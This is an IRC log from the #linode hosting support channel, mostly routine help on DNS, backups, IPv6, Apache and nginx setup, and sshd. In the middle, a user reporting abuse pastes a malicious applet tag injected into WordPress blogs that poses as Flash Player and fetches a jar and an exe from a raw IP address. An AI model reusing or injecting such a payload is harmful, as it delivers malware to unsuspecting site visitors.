12:14<mwalling>oh, i dont have an MX there because i let it fallback to the A
12:15<JshWright>Antwan: do you have any internal monitoring for you memory usage during that interval? The lack of swap usage suggests that memory wasn't an issue, but I'd still be curious
12:16<gawry>how should i point the mx of the second domain to the mail server?
12:16<JshWright>judging by the spike in inbound traffic during that time, I'd guess it might have been a nominal attempt at a DoS
12:16-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Quit: ircuser-1_]
12:20<Sophira>mwalling: You misspelt the domain, actually.
12:20<Sophira>mwalling: You asked for donlike.us, without the T.
12:22<mwalling>Sophira: ha, thanks
12:23<Sophira>No probs :)
12:23<mwalling>gawry: in clowncar.org, i put "Mail Server" = "you.dontlike.us"
12:23<gawry>mwalling: thnks... i'm going to try that
12:26-!-atula [~neobreed@c-71-232-3-65.hsd1.ma.comcast.net] has joined #linode
12:26-!-burningdog [~roger@196-215-4-219.dynamic.isadsl.co.za] has joined #linode
12:27<mwalling>gawry: that solves DNS, but make sure mail works... your mail server needs to know it is getting mail for your new domain, otherwise senders are going to get cyrptic messages like "relay access denied"
12:30-!-nmudgal [~tracker@219.91.156.28] has joined #linode
12:33<+linbot>New news from forums: Easiest way to forward mail in Email/SMTP Related Forum <http://forum.linode.com/viewtopic.php?t=7540>
12:37-!-hfb [~hfb@pool-96-247-108-172.lsanca.dsl-w.verizon.net] has joined #linode
12:43-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has joined #linode
12:47-!-stephenplatz [~steve@71-32-90-206.tukw.qwest.net] has joined #linode
12:48-!-cps [~cps@c-69-255-165-196.hsd1.md.comcast.net] has joined #linode
12:49-!-joshdotsmith [~joshsmith@cpe-76-169-8-192.socal.res.rr.com] has quit [Quit: joshdotsmith]
12:52-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has joined #linode
12:52-!-nisstyre [~nisstyre@infocalypse-net.info] has quit [Ping timeout: 480 seconds]
12:52-!-nisstyre [~nisstyre@infocalypse-net.info] has joined #linode
12:52-!-walterheck [~walterhec@78.180.87.129] has quit [Quit: Computer has gone to sleep]
12:54-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has quit [Quit: Leaving]
13:03-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit [Quit: Leaving...]
13:04-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 480 seconds]
13:11-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
13:14-!-RoosterJuice [~Gavan@S010600119573eb5d.cg.shawcable.net] has joined #linode
13:14-!-seanh-ansca [~Adium@173-8-133-236-SFBA.hfc.comcastbusiness.net] has joined #linode
13:16-!-Dianoga_ [~dianoga7@72.14.188.52] has quit [Quit: leaving]
13:16-!-lakin [~lakin@184.71.38.158] has joined #linode
13:18-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has joined #linode
13:19-!-Dianoga [~dianoga7@72.14.188.52] has joined #linode
13:23-!-Dianoga [~dianoga7@72.14.188.52] has quit []
13:24-!-Dianoga [~dianoga7@72.14.188.52] has joined #linode
13:25-!-Dianoga [~dianoga7@72.14.188.52] has quit []
13:25-!-Dianoga [~dianoga7@72.14.188.52] has joined #linode
13:26-!-Dianoga [~dianoga7@72.14.188.52] has quit []
13:26-!-atula [~neobreed@c-71-232-3-65.hsd1.ma.comcast.net] has quit [Read error: Connection reset by peer]
13:26-!-Dianoga [~dianoga7@72.14.188.52] has joined #linode
13:26-!-atula [~neobreed@c-71-232-3-65.hsd1.ma.comcast.net] has joined #linode
13:28-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has quit [Remote host closed the connection]
13:28<p3rsist>Anyone has configured corosync instead of heartbeat with a linode cluster?
13:28-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has joined #linode
13:34-!-pleia2_ is now known as pleia2
13:36-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Read error: Operation timed out]
13:36-!-jamied [~4cc8c91b@chat.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
13:36-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has quit [Quit: Leaving]
13:37-!-kettle [~johnathan@host86-174-203-100.range86-174.btcentralplus.com] has joined #linode
13:38-!-johnathanb [~johnathan@host86-184-183-89.range86-184.btcentralplus.com] has quit [Ping timeout: 480 seconds]
13:40-!-creo [~43471a7e@chat.linode.com] has joined #linode
13:41-!-stephenplatz [~steve@71-32-90-206.tukw.qwest.net] has quit [Quit: Leaving]
13:41<creo>Hi, the backup solution for linode is a snapshot base on files, is it possible to restore only somes files?
13:43<gawry>creo: I think you may restore a backup and then grab only the files you need. I think it is possible to keep both current and backup disks working simuntaniously
13:44-!-karanlyons [~karanlyon@c-66-31-201-37.hsd1.ma.comcast.net] has joined #linode
13:45<karanlyons>Good afternoon.
13:45<+linbot>New news from forums: GoogleApp softfail in Email/SMTP Related Forum <http://forum.linode.com/viewtopic.php?t=7541>
13:46<gawry>creo: but i've never done it before
13:47<creo>Ok
13:50<creo>In the worst case, you can get a new linode and restore to this linode for getting back file, but for the context a user delete a working file, I found this a heavy solution.
13:50-!-atula [~neobreed@c-71-232-3-65.hsd1.ma.comcast.net] has quit [Read error: Connection reset by peer]
13:50-!-atula [~neobreed@c-71-232-3-65.hsd1.ma.comcast.net] has joined #linode
13:53-!-squircle [~squircle@d24-150-105-60.home.cgocable.net] has joined #linode
13:54-!-squircle is now known as Guest5452
13:54<Guest5452>:(
13:54-!-quicksketch [~quicksket@208.73.113.6] has joined #linode
13:55-!-techhelper1 [~techhelpe@166.135.78.41] has joined #linode
13:55-!-Guest5452 is now known as squircle
13:55<squircle>hurray!
13:55<karanlyons>squircle: It's finished?
13:55-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has quit [Ping timeout: 480 seconds]
13:55<karanlyons>Also, hi!
13:55-!-hfb [~hfb@pool-96-247-108-172.lsanca.dsl-w.verizon.net] has quit [Read error: Connection reset by peer]
13:55<squircle>karanlyons: well I was hurraying that nickserv gave me my name back, but yes, it's finished
13:55<squircle>hi!
13:56<karanlyons>Awesome! How many did we find with wildcard entries?
13:56<karanlyons>And/or, is the log available to download?
13:56<squircle>i'm just compressing it right now
13:56<karanlyons>Oh man, how big is it?
13:57<squircle>i think there's one entry with a bit of an anomaly; it was CNAME'd but the CNAME had no A record
13:57<squircle>i'm just trying to find it
13:57-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has joined #linode
13:57<squircle>it's 31MB
13:57<karanlyons>Wow.
13:58<creo>Someone use the linode backup?
13:58<karanlyons>I do, but I haven't restored from it yet.
13:59<squircle>karanlyons: now I have to re-do all the statistics :-/
13:59<karanlyons>Because of the orphaned CNAME?
13:59<squircle>karanlyons: there are 6 or 7
13:59<squircle>they would've been mis-counted
13:59<karanlyons>We should send emails to those sites telling them off.
14:00<A-KO>anyone here a big vmware user? Do you use linked clones as a basis for your systems or do you just flat build new vmdk's for everything?
14:00-!-smed [~smed@ool-4353493d.dyn.optonline.net] has quit [Read error: Connection reset by peer]
14:00-!-smed [~smed@ool-4353493d.dyn.optonline.net] has joined #linode
14:01-!-e0xbr [~bd2f1fd0@chat.linode.com] has joined #linode
14:02-!-user9421 [~bd2f1fd0@chat.linode.com] has joined #linode
14:02<user9421>hello
14:03<karanlyons>Hello, user9421.
14:03<user9421>Someone from linode can help me?
14:03<karanlyons>!ops
14:03<+linbot>Users with ops are employees of Linode, and know what they're talking about. The rest of us are the ever-so-helpful(?) community. Official Linode contact information: http://www.linode.com/about/
14:04<karanlyons>Ask away, and I'm sure someone in the channel can.
14:04<user9421>I just have a abuse report to do, one user is hosting malware java here
14:04<squircle>!abuse
14:04<+linbot>Linode's abuse contact is abuse@linode.com , as shown in the abuse contact info for the IP address in question. http://www.iana.org/abuse/faq.html shows how to look this up yourself.
14:05<user9421>okay! thank you! I will report!
14:05<user9421>http://173.230.145.103/adobe.jar applet is here, I am reporting right now.. Thanks
14:05-!-kaul [~kaul@c-98-202-87-28.hsd1.ut.comcast.net] has joined #linode
14:05-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has joined #linode
14:05*squircle debates clicking the link...
14:06<iggy>heh, me too
14:06<karanlyons>squircle: I just did. It just downloads a jar file.
14:06<squircle>but what IS the jar file?!
14:06<squircle>mysteries
14:06<karanlyons>Like hell am I going to run it.
14:06-!-e0xbr [~bd2f1fd0@chat.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
14:07<user9421>The guy is putting that on wordpres blogs
14:07-!-rurufufuss [~rurufufus@115-64-27-246.static.tpgi.com.au] has quit [Remote host closed the connection]
14:07<user9421>sql injection
14:07<user9421><applet name="Adobe Flash Player 12" code="afp.class" archive="http://173.230.145.103/adobe.jar" width="1" height="1"><param name="link" value="http://173.230.145.103/adobe.exe"></applet>
14:07<user9421>I dont know what it do
14:07<JshWright>user9421: so why aren't you emailing Linode's abuse contact?
14:07<user9421>but, it isnt a good thing
14:07<karanlyons>JshWright: He is.
14:07<user9421>I'm doing this right now
14:08<JshWright>don't link to likely malware in this channel
14:08-!-lakin [~lakin@184.71.38.158] has quit [Quit: Ex-Chat]
14:08<squircle>is the quasi-official semi-proper file extension for a tar/bzip2 file .tbz or .tbz2?
14:08-!-user9421 [~bd2f1fd0@chat.linode.com] has quit [Quit: CGI:IRC]
14:08<JshWright>I use .tar.bz2
14:08<karanlyons>Me too.
14:09<drewr>+1
14:09<squircle>done
14:09<squircle>uploading now...
14:09<karanlyons>Awesome.
14:09<squircle>oh good, it's only 7MB compressed
14:10<karanlyons>I've got the sourcecode for the malware, if anyone is curious.
14:10<karanlyons>squircle: That makes sense, there's a ton of repitition.
14:10<karanlyons>s/repitition/repetition/
14:11-!-walterheck [~walterhec@78.180.87.129] has joined #linode
14:11<karanlyons>The jar file basically just downloads another file.
14:11<squircle>karanlyons: http://li288-168.members.linode.com/dnslookup.tar.bz2
14:12<squircle>enjoy!
14:12-!-harrumph_ [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has joined #linode
14:12<karanlyons>Thanks!
14:12<squircle>(you should probably read the stats.txt file first; it's what you're really looking for)
14:12<squircle>anybody else who wants it, go for it, i'll leave it up for a little bit
14:12<karanlyons>Not bad, 1/4 with wildcards.
14:12<karanlyons>I honestly though it'd be smaller.
14:13<squircle>is your UA string "Ringringringringringringring/bananaphone doo/doodoodoodoodoo"?
14:13<karanlyons>Haha, no.
14:13<squircle>whoever's UA string that is... I love you :P
14:13<karanlyons>But that's awesome.
14:15<squircle>karanlyons: does the formatting look okay to you in stats.txt? I have two different text editors showing me vastly different alignments...
14:15-!-harrumph_ [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has quit [Read error: Connection reset by peer]
14:15-!-harrumph [~harrumph@173-110-69-91.pools.spcsdns.net] has quit [Ping timeout: 480 seconds]
14:16<karanlyons>It looks fine, the lines look like this: "wordpress.com --> 74.200.244.59"
14:16<squircle>karanlyons: no, in stats.txt... for me, the "number" and "percentage" columns are borked
14:16-!-harrumph [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has joined #linode
14:16<karanlyons>Nope, that looks fine too. Though it'll depend on how many spaces you've defined a tab as.
14:17<squircle>karanlyons: well it textwrangler and bbedit it looks fine, but textedit.app just...
14:17<squircle>doesn't like it :P
14:17<karanlyons>Textedit defines a tab as 8 columns, whereas the others (rightly) define it as 4.
14:18<squircle>aah
14:19<karanlyons>Oh man, this file is killing TextMate.
14:20<squircle>karanlyons: it's not even that big!
14:20<karanlyons>Or rather, my stupid deciscion to use TextMate for a regex find/replace is killing TextMate.
14:20<squircle>oh
14:20<squircle>you brought that upon yourself
14:20<karanlyons>Yup.
14:20<squircle>i also should learn how to use printf to make results.txt look prettier
14:20<squircle>apparently C# has no printf() :-/
14:20<karanlyons>squircle: You can also use echo -ne.
14:21<karanlyons>Oh, never mind, I was still thinking about bash.
14:21<squircle>well there's GNU printf; i could've used that in this case
14:21<squircle>but in the interest of time...
14:23<karanlyons>This malware is pretty lame.
14:23<karanlyons>At least, the jar is.
14:23<karanlyons>It's just a ton of obfuscation around a boring way to download a file.
14:24<karanlyons>But obfuscation isn't so helpful when you then name your functions stuff like DownloadFile().
14:24<squircle>magicalUnicorns()
14:26<karanlyons>Seriously, though, this guy could have at least minified the code to make it slightly more difficult.
14:26-!-harrumph [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has quit [Read error: Connection reset by peer]
14:26-!-harrumph [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has joined #linode
14:27<karanlyons>Haha, TextMate is maxing out one of my cores.
14:27<karanlyons>And my memory.
14:29-!-jamescollins [~jamescoll@202.161.22.252] has joined #linode
14:29-!-bVector [~bVector@i.am.bvector.net] has joined #linode
14:30<mwalling>squircle: uh, its just not called printf
14:30-!-harrumph_ [~harrumph@173-149-101-171.pools.spcsdns.net] has joined #linode
14:30<mwalling>squircle: there are a lot of .write() overloads that take format strings and arg arrays
14:31<squircle>mwalling: oh, really? I'll have to look into that
14:31<bVector>new to ipv6, has anyone played around with assigning a vanity ipv6 to their linode? not sure which addresses from 2600:3c01::f03c:91ff:fe96:7a78/64 I can choose
14:32-!-joshdotsmith [~joshsmith@216.2.81.210] has joined #linode
14:32<karanlyons>Wait, you can choose the address to assign?
14:33<JshWright>bVector: you don't have that whole subnet
14:33<Nivex>if you get a pool you can assign, otherwise you get the SLAAC
14:33-!-joshdotsmith [~joshsmith@216.2.81.210] has quit []
14:33<JshWright>you get just that address
14:33<JshWright>if you get a pool, then you can assign multiple addresses
14:33-!-pearlbear [~mpm@c-69-181-186-56.hsd1.ca.comcast.net] has joined #linode
14:33-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has quit [Read error: Connection reset by peer]
14:34-!-kenichi [~kenichi@c-24-20-239-11.hsd1.or.comcast.net] has joined #linode
14:34<bVector>ahh, it seems that you can request a 4096 pool of ipv6 addresses at no charge
14:34<pearlbear>Hi folks. Is Disk IO rate something that is useful to monitor? My CPU and Memory levels are fine, but I keep getting the IO alarm. Any tips or suggestions? Other VPS services I've used don't even track this.
14:34-!-f8- [~buddyw@ninja.budw.net] has quit [Quit: leaving]
14:35<karanlyons>pearlbear: I'd look into what's hitting your disk so hard, as it'll be impacting site performance.
14:35<JshWright>pearlbear: so long as you know why the disk I/O is happening, it's nothing to worry about
14:35<jamescollins>hi guys, is it possible to get more than 1 ip address for a linode?
14:35<JshWright>the disk i/o warning is there, mostly to let you know if you start swapping hard
14:35<pearlbear>karanlyons: it's just one drupal site - not even an especially big one at that.
14:35<JshWright>jamescollins: is it possible to read a FAQ?
14:35<jamescollins>(our dedicated server is down so I'm doing an emergency migration of some customer sites to our backup linode)
14:36<mwalling>!ips
14:36<JshWright>jamescollins: the short answer is... with technical justification, yes, it is possible
14:36<+linbot>Each Linode comes with 1 public IPv4 address. Additional IPv4 addresses are $ 1/month, and require technical justification. With IPv6 enabled each Linode is assigned one IPv6 address, and pools of 4,096 shareable IPv6 addresses can be requested at no charge.
14:36<pearlbear>karanlyons, JshWright: thanks
14:36<karanlyons>pearlbear: If you don't know what's causing the disk I/O, I'd definitely say you should figure it out.
14:36-!-harrumph [~harrumph@c-98-206-144-59.hsd1.il.comcast.net] has quit [Ping timeout: 480 seconds]
14:36-!-harrumph_ is now known as harrumph
14:36<karanlyons>If only because fixing it should make your site more performant.
14:36<mwalling>not a word
14:38-!-FastLizard4 [fastlizard@lizardwiki.dyndns.org] has joined #linode
14:38-!-FastLizard4 [fastlizard@lizardwiki.dyndns.org] has quit []
14:38-!-JSharp [~j@dyn125.3crowd.com] has joined #linode
14:40-!-kaul [~kaul@c-98-202-87-28.hsd1.ut.comcast.net] has quit [Ping timeout: 480 seconds]
14:41<jamescollins>thanks JshWright, I've opened a ticket ([553277])
14:41-!-bVector [~bVector@i.am.bvector.net] has quit [Remote host closed the connection]
14:47-!-f8- [~buddyw@ninja.budw.net] has joined #linode
14:49-!-p3rsist [~dannyf@modemcable251.101-23-96.mc.videotron.ca] has quit [Ping timeout: 480 seconds]
14:50-!-f8- is now known as buddyw
14:51-!-buddyw [~buddyw@ninja.budw.net] has quit []
14:52-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has quit [Ping timeout: 480 seconds]
14:54-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has joined #linode
14:54-!-kindari [~William@ip72-207-49-188.sd.sd.cox.net] has joined #linode
14:55<kindari>Hey guys, does anyone know if the Linode DNS manager supports wildcard subdomains?
14:55<purrdeta>it does
14:55<kindari>Lovely!
14:56<karanlyons>Ah, wildcard domains.
14:58<+linbot>New news from forums: Can't get user-defined function to work in Web Servers and Web App Development <http://forum.linode.com/viewtopic.php?t=7534>
14:58-!-walterheck [~walterhec@78.180.87.129] has quit [Quit: Computer has gone to sleep]
14:59<karanlyons>Hey, random question time! Is there a way to set fastcgiparams conditionally in Nginx (specifically, based on GET arguments)?
15:00-!-walterheck [~walterhec@78.180.87.129] has joined #linode
15:00-!-creo [~43471a7e@chat.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
15:01<karanlyons>s/fastcgiparams/fastcgi_params/
15:04-!-pigdude [~tallen@gateway1.atlantic-media.us] has joined #linode
15:08-!-Avinash [~7ab1d982@chat.linode.com] has joined #linode
15:08-!-niemeyer [~niemeyer@72-254-15-217.client.stsn.net] has quit [Ping timeout: 480 seconds]
15:09-!-pearlbear [~mpm@c-69-181-186-56.hsd1.ca.comcast.net] has quit [Ping timeout: 480 seconds]
15:11-!-hfb [~hfb@pool-96-247-53-174.lsanca.dsl-w.verizon.net] has joined #linode
15:14-!-Avinash [~7ab1d982@chat.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
15:14-!-maushu [~maushu@78.130.1.41.rev.optimus.pt] has joined #linode
15:17-!-tunabananas [~Adium@c-67-180-194-183.hsd1.ca.comcast.net] has joined #linode
15:18<tunabananas>Hi! I am having some issues with my default virtual host i think
15:19<tunabananas>should it only read <VirtualHost 173.255.251.182:80> with nothing under it?
15:22-!-Lucas1 [~Lucas@ip134-10.ct.co.cr] has quit [Remote host closed the connection]
15:22<tunabananas>meow?
15:25<tunabananas>anyone in here?
15:25<tunabananas>other than 481 users? ;)
15:25<JshWright>I use nginx ;p
15:25-!-alex_m [~alex_m@208-92-44-113.advancemags.com] has joined #linode
15:26<JshWright>what makes you suspect something's wrong with it?
15:27<JshWright>but you're right... it should (at the very least) have a </VirtualHost>
15:27<tunabananas>it has much more than that
15:27<tunabananas>i set up a wordpress multisite install
15:28<tunabananas>and created a symbolic link between the primary domain for that installation (http://lookgoodonthe.net) and another domain (banqdesign.com)
15:28<JshWright>I think I'm gonna regret replying shortly...
15:28<JshWright>symlinking between virtualhost definitions?
15:29<JshWright>or between the document roots?
15:29<JshWright>or somethings else entirely... "symbolic link between [the domains]" is ambigous
15:30<JshWright>s/ambigous/ambiguous/
15:30<JshWright>also... s/somethings/something/
15:30<JshWright>(Now who's talking to himself?)
15:31-!-Jerub_ [~sthorne@host-92-24-174-222.ppp.as43234.net] has joined #linode
15:31<tunabananas>ha, sorry, trying to get ahold of the friend who did this yesterday for us
15:32<tunabananas>he has a tendency to not document his process.. also i simply don't remember as he was explicating the difference to me yesterday and should've retained that
15:33-!-walterheck [~walterhec@78.180.87.129] has quit [Quit: Computer has gone to sleep]
15:33-!-datagutt [~datagutt@121.80-202-130.nextgentel.com] has quit [Quit: Computer has gone to sleep.]
15:33<purrdeta>I am migrating to nginx! :P
15:33<karanlyons>purrdeta: Fantastic!
15:34<purrdeta>I actually think I have everything working, I just have to take the plunge :P
15:34<karanlyons>Trust me, it's worth it.
15:34<karanlyons>Let me know if you have trouble.
15:34-!-Jerub_ [~sthorne@host-92-24-174-222.ppp.as43234.net] has left #linode []
15:35<purrdeta>the only thing I'm concerned about is getting nagios to run. I've seen some old outdated guides about it that I may try to work with... but for now I've got mailman (using fcgiwrap) and wordpress (via php-fpm) working great
15:35<purrdeta>I also like that I'll be able to reverse proxy to my webirc client thing that runs on a seperate port :D
15:40<karanlyons>I probably should switch to php-fpm instead of fastcgi.
15:41-!-techhelper1 [~techhelpe@166.135.78.41] has quit [Quit: Computer has gone to sleep.]
15:41<AlexC_>php-fpm++
15:42<karanlyons>If I recall correctly, it's theoretically faster and self-scaling in comparison to fastcgi. Am I right?
15:43-!-walterheck [~walterhec@78.180.87.129] has joined #linode
15:43<tunabananas>@JshWright: it was between the /srv/www/lookgoodonthe.net and /srv/www/banqdesign folders
15:43-!-walterheck [~walterhec@78.180.87.129] has quit []
15:43<tunabananas>he didn't touch the DocumentRoots
15:45<JshWright>tunabananas: I'm not sure what the point of that would be
15:45<JshWright>if you want multiple domains to use the same content, just point them to the same DocumentRoot
15:47<JshWright>that's assuming you want to maintain seperate VirtualHost's for them at all
15:47<Musfuut>Is there a way to put a sign up of some sort saying script kiddiez and bots please don't bother you are just cluttering my logs with your fail?
15:47<purrdeta>karanlyons: so I hear. But I dunno, I'm starting out this way. :P. The only thing I even kinda worry about is nagios because it's bizzare... but meh
15:47<JshWright>if they're really just aliases for the same content, you can simply add a ServerAlias directive to lookgoodonthe.net's VirtualHost
15:47<mwalling>Musfuut: fail2ban and similar "help"
15:48<mwalling>JshWright: be aware of the google duplicate content seo magic fu
15:49<JshWright>how would good know if it's a symlinked document root, a seperate virtualhost pointing to the same root, or a ServerAlias?
15:49<JshWright>s/good/google/
15:49-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has quit [Ping timeout: 480 seconds]
15:49<mwalling>same content, two domains
15:49<Musfuut>mwalling: Ah good suggestion
15:49<JshWright>but that's going to be true in all three cases
15:49<mwalling>yes
15:50<tunabananas>there was a reason why my friend chose not to touch the document roots
15:50<JshWright>there's always a reason... that doesn't mean it was a good one
15:50-!-nmudgal [~tracker@219.91.156.28] has quit [Ping timeout: 480 seconds]
15:50-!-tktiddle [~tim@cpc1-hari12-2-0-cust76.hari.cable.virginmedia.com] has joined #linode
15:50<karanlyons>Musfuut: Check out http://www.sshguard.net/ as well.
15:52<JshWright>tunabananas: is the goal to make banqdesign.tld serve the same content as lookgoodonthe.net?
15:53<tunabananas>yes
15:53<tunabananas>adding the ServerAlias directive sounds like a good idea
15:53<JshWright>yep, that's the easiest way to accomplish that
15:54<tunabananas>cool, i will try that and let you know how it works :) thanks!
15:54<JshWright>I have no idea why you would symlink a document root in order to point a VirtualHost at it
15:54<randallman>Logging
15:54<randallman>if you wanted seperate logging :0
15:55<randallman>(amongst other things)
15:55<JshWright>that explains why you would have a sepreate VirtualHost, but why bother symlinking the content?
15:55<JshWright>just point both VirtualHosts at the same root
15:55<randallman>you wouldnt, you'd just use the same yeah
15:55<randallman>same DocumentRoot
15:56<randallman>Probably do something interesting with SetEnvIf too
15:56<randallman>and logging
15:56<randallman>!env=foo
15:56<SleePy>Why even make a different ghost then...
15:56<SleePy>*vhost
15:58<Musfuut>thanks karanlyons I will look into that :)
15:58<tunabananas>heh, that was my solution at first, but was falsely corrected by my debian dev geek friend
15:58-!-Digital [~sdyoung@vt220.org] has joined #linode
15:59<Digital>hello. I have a linode VPS that is running karmic. I would like to upgrade it to something that is actually still, you know, maintained.
15:59<tunabananas>should i un-symlink the directories?
15:59<JshWright>tunabananas: I would
15:59<Digital>What is the preferred method for doing this with linode? do-release-upgrade?
15:59<JshWright>Digital: yeah, that should do it. What DC are you in?
15:59<Digital>london
16:00<Digital>should I be worried that do-release-upgrade is unhappy because lspci and friends don't work due to (I guess) xen?
16:00<JshWright>AviMarcus runs a caching apt proxy there, if you want to save yourself some bandwidth
16:00<Digital>yeah, I'm already using the local apt proxies. I think it's actually the default.
16:00<Digital>s/proxies/caches/, I guess.
16:01<JshWright>no, the images don't default to a local proxy
16:01<SleePy>!linsides
16:01<JshWright>linsides doesn't have anything in London
16:02<Digital>oh, you're right.
16:02<SleePy>Ooh it doesn't yet :P
16:02<JshWright>Linsides backend control stuff uses IPv6, which means it can't be rolled out in London yet
16:03-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has quit [Read error: Connection reset by peer]
16:04<tunabananas>so to remove the symbolic link i would just "rm /srv/www/banqdesign.com"?
16:04-!-heliosta_ [~heliostat@nat-204-14-239-211-sfo.net.salesforce.com] has joined #linode
16:04<Digital>is there some linode.com document that states this authoritatively? I couldn't find one.
16:04<tunabananas>sorry am still quite new to the command line
16:04-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has joined #linode
16:04<JshWright>Digital: that states what?
16:05<JshWright>that do-release-upgrade works?
16:05<Digital>well, the recommended procedure from moving from one ubuntu release to the next.
16:05<JshWright>unless there's a library article, I don't believe so
16:05<Digital>okay then.
16:06<SleePy>do-release-upgrade works
16:06<SleePy>I've used it in the past a few times
16:06<JshWright>Linode billing is pro-rated to the day, so you could simply clone your node, test it, and then remove the clone
16:06<Musfuut>I wonder how long before it isn't considered strange for a website to only be on IPv6
16:06<Digital>right. okay, thanks a lot!
16:06<HoopyCat>Musfuut: has not yet happened in #linode
16:06<JshWright>Musfuut: my guess is, quite a while
16:07<Digital>oh hello hoopycat.
16:07-!-heliostatic [~heliostat@204.14.239.223] has quit [Ping timeout: 480 seconds]
16:07<Musfuut>HoopyCat: Say again? :)
16:07<JshWright>to clarfiy what I said earlier: Linsides supports both IPv4 and IPv6, both for linsides.com and the services provided (actually... IPv6 isn't available yet for the memcached stuff... soon...), but the infrastructure behind it communicates via IPv6
16:08<Digital>hoopycat: #penguin/#linux/#linpeople say hello!
16:08-!-Digital [~sdyoung@vt220.org] has quit [Quit: xyz]
16:09<randallman>heh linpeople...
16:09<randallman>Is that from lilonet? P
16:09<SleePy>Whats for lunch:
16:10-!-mathew [~mathew@cpc5-flit3-2-0-cust101.9-1.cable.virginmedia.com] has quit [Quit: Leaving]
16:10<Musfuut>JshWright: Ah
16:11<JshWright>it just makes life easier when the controller in Newark has to talk to the memcached host in Dallas...
16:12<Musfuut>I've been meaning to ask this since I first joined this chat... on slicehost, hosts were called slices, on linode they are called?
16:12<JshWright>linodes
16:12<JshWright>or just 'nodes'
16:12-!-techhelper1 [~techhelpe@pool-108-43-150-128.plspca.fios.verizon.net] has joined #linode
16:12<mikegrb_>lulz
16:12<Musfuut>that is what I thought lol
16:15<Musfuut>thanks, I imagine at some point linode is going to run out of IPv4 addresses for new ... linodes and will have to offer IPv6 only linodes. I'm wondering how long before those linodes are no longer at a huge disadvantage. Also how that will affect growth, I imagine companies won't want to pay for low-accessibility hosting and will try to buy hosts with
16:15<Musfuut>existing IPv4 addresses
16:16<Dave>well thats going to be the same for all ISP's, and there is quite some time before LIR's run out of IPv4 address space
16:17<Dave>which is no excuse for not deploying IPv6 right now
16:17-!-ramden [~4def057c@chat.linode.com] has joined #linode
16:17-!-jbw [~jbw@dsl-044-084.cust.imagine.ie] has quit [Ping timeout: 480 seconds]
16:17<ramden>hello
16:17<ramden>is there any personell here
16:17<karanlyons>!ops
16:17<+linbot>Users with ops are employees of Linode, and know what they're talking about. The rest of us are the ever-so-helpful(?) community. Official Linode contact information: http://www.linode.com/about/
16:18<ramden>ok
16:18<Musfuut>True about being all ISPs, I didn't mean it was only linodes problem, just that being on linode I'm more interested in their success than other hosts or companies.
16:18<Musfuut>:)
16:19<tunabananas>@JshWright: so I removed the directory /srv/www/banqdesign.com/, then changed the vhost for banqdesign.com to the lookgoodonthe.net DocumentRoot
16:19<tunabananas>and added www.banqdesign.com as another ServerAlias in the vhost file for lookgoodonthe.net
16:21<maushu>Anyone knows how to run two instances of ssh in two different ports?
16:21<maushu>*sshd
16:21<Dave>ARIN have just under 6 /8's left, so they have quite a long time before they can't get v4 address space
16:21<karanlyons>maushu: Why do you want to?
16:22<maushu>karanlyons, custom authentication, custom shell.
16:22<maushu>Virtual users too.
16:23<maushu>I just find it weird that it's so difficult to do this. I didn't have these problems with telnet.
16:23<karanlyons>You could just clone everything related to sshd and rewrite the copied configs to point to the clone.
16:23<maushu>karanlyons, did that, but I think pam is not working.
16:23<maushu>Or maybe it is and I'm confused like hell.
16:24<ramden>who can help me with domain transfer questions?
16:24<ramden>one of the ops
16:24-!-gawry [~gustavoga@187.126.136.210] has quit [Quit: gawry]
16:24<karanlyons>I've never had occasion to do this myself, but have you tried linking your second sshd in /etc/pam.d/ ?
16:24<hawk>Dave: Not really that long time... I guess it's a matter of perspective.
16:24<maushu>karanlyons, linking?
16:25<karanlyons>ramden: If it's just a general question about transferring domains, we could help you.
16:25<karanlyons>maushu: ln -s.
16:25-!-gawry [~gustavoga@187.126.136.210] has joined #linode
16:25<maushu>oh, you mean like ln -s sshd sshd_custom
16:25<ramden>thank you...i have a domain hosted on the old dns server
16:25<karanlyons>Yup/
16:25<ramden>now i want to transfer it to linode
16:25<karanlyons>s/\///
16:25<ramden>what is the procedure
16:25<maushu>Did that too, but no matter I change it nothing happens.
16:26<karanlyons>maushu: And you've restarted all the various services?
16:26<maushu>Hummm, only sshd_custom.
16:26<karanlyons>ramden: You just need to point your domain to linode's DNS servers.
16:26<maushu>Pam doesn't have a service, me thinks.
16:26-!-jbw [~jbw@dsl-044-084.cust.imagine.ie] has joined #linode
16:26<ramden>ok
16:27<maushu>Wait, I didn't link it, I copied the pam file. (Since I want to change it.)
16:27<maushu>ramden, who owns your domain?
16:27-!-stafamus [~stafamus@host-92-24-39-144.ppp.as43234.net] has joined #linode
16:27<karanlyons>maushu: Hold on a second, I'm writing up how I'd do it.
